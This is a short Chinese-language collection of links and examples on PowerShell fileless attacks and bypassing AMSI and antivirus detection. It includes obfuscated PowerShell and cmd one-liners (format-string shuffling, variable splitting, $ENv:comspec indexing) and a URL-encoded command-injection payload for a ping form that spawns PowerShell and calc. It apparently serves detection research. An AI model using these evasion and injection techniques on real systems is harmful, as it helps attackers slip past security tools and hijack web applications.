一些重要的链接:
powershell无文件挖矿 https://bbs.pediy.com/thread-253375.htm
无文件勒索 https://www.cnblogs.com/bonelee/p/15910502.html
powershell AMSI https://www.cnblogs.com/bonelee/p/16221887.html
各种绕过AMSI,分割,编码、xor、hex编码等 https://www.cnblogs.com/bonelee/p/16221958.html ==》另外,还提到了powershell数据采集
AMSI底层机制的探讨,如何绕过 https://www.cnblogs.com/bonelee/p/16220508.html
AMSI的介绍,有点老,可能不那么客观 https://www.cnblogs.com/bonelee/p/15924898.html
powershell 通过base64、utf8和分割绕过杀软 https://www.cnblogs.com/bonelee/p/15947640.html
无文件勒索 base64、xor编码绕过 https://www.cnblogs.com/bonelee/p/15910558.html
下面这些绕过场景,可以使用ML检测 https://www.cnblogs.com/bonelee/p/13768475.html
具体的示例(不全,要结合上面文章综合看):
将执行命令的字符串进行编码来绕过检测
(("{7}{4}{0}{13}{1}{10}{12}{3}{2}{6}{5}{11}{8}{9}"-f 'V','C',' 6yB',' (','VCFipVCF+VCFconf','eC[4,26','ENv:comsP',' (','InVCF','VCF)','F)',',25]- jo',' hDY&','CF+VCFigV')).replAce(([ChAR]54+[ChAR]121+[ChAR]66),[StRing] [ChAR]36).replAce('VCF',[StRing][ChAR]39).replAce('hDY','|') |.( $verBOSEpREFEREnCE.tOSTRiNg()[1,3]+'x'-jOin'')
将命令拆分和字符替换达到混淆效果:
C:\Users>set lkf3=e&&set z6km=se&&set 0d=r&&set tXvd=n&&set 7B=t u&&call set AF=%tXvd%%lkf3%%7B%%z6km%%0d%&&call %AF% \\DESKTOP-NFBQJAR 的用户帐户 ------------------------------------------------------------------------------- Administrator DefaultAccount Guest WDAGUtilityAccount 命令成功完成。 C:\Users>echo %AF% net user
BAT语法、Powershell 与certutil结合、PowerShell混淆以及Cmd混淆等命令执行
ipaddress=127.0.0.1+%26+powershell+%22%28%27ip%27%2B%27conf%27%2B%27ig%27%29+%7C%26+%28%24ENv%3AcomsPeC%5B4%2C26%2C25%5D-joIn%27%27%29%22&submit=ping 还原后: ipaddress=127.0.0.1+&+@^p^o^w^e^r^shell+C:\W*?w?\S*?32\?a?c.e?e&submit=ping
@^p^o^w^e^r^shell C:\W*?w?\S*?32\?a?c.e?e
利用powershell$Env进行命令注入利用
powershell混淆:
执行ipconfig
powershell "('ip'+'conf'+'ig') |& ($ENv:comsPeC[4,26,25]-joIn'')"